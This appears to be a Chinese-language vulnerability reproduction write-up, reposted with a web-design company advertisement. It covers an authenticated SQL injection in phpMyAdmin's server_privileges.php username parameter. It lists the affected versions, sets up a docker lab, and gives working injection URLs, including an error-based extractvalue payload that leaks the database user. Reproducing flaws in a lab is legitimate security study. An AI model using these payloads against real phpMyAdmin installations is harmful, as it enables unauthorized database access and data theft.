如何进行phpMyAdmin后台SQL注入

如何进行phpMyAdmin后台SQL注入，相信很多没有经验的人对此束手无策，为此本文总结了问题出现的原因和解决方法，通过这篇文章希望你能解决这个问题。

成都创新互联是一家专业提供万安企业网站建设,专注与网站设计制作、成都网站制作、H5响应式网站、小程序制作等业务。10年已为万安众多企业、政府机构等服务。创新互联专业网站建设公司优惠进行中。

0x01 简介

phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径，尤其要处理大量资料的汇入及汇出更为方便。

0x02 漏洞概述

用户界面SQL执行语句存在可控变量，且未对可控参数进行过滤直接拼接。可造成低权限用户越权执行SQL指令。

0x03 影响版本

前提：已知一个用户名密码

phpMyAdmin 4 < 4.9.4

phpMyAdmin 5 < 5.0.1

0x04 环境搭建

在线环境：
转发本文至朋友圈并截图发至公众号内
自行搭建：
本次复现环境使用PhpMyAdmin4.5.0版本，使用docker搭建。

git clone https://github.com/Paper-Pen/TLSHUB.gitcd TLSHUB/phpAdmin/docker-compose up -ddocker ps

如何进行phpMyAdmin后台SQL注入

访问页面http://xx.xx.xx.xx:8001
数据库账号密码root/li9hu

环境搭建好了，可以开始进行漏洞复现了

0x05 漏洞复现

简单总结流程：

页面位置server_privileges.php；

设置变量ajax_requests为true；

设置变量validate_username 为真值；

设置变量username 为我们拼接的注入语句。

构造payload：

http://192.168.209.139:8001/server_privileges.php?ajax_requests=true&validate_username=1&username=1%27or%201=1%20--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server

（token和其余参数会在访问页面的时候自动提供）

我们查看后端收到的数据，可以看到SQL已经成功拼接。

如何进行phpMyAdmin后台SQL注入

执行完毕后程序只会告知SQL是否执行成功，失败会报错，因此此处我们可以利用报错注入。

构造payload：

http://192.168.209.139:8001/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server

结果如下，可以看到已经成功执行了我们注入的指令。

如何进行phpMyAdmin后台SQL注入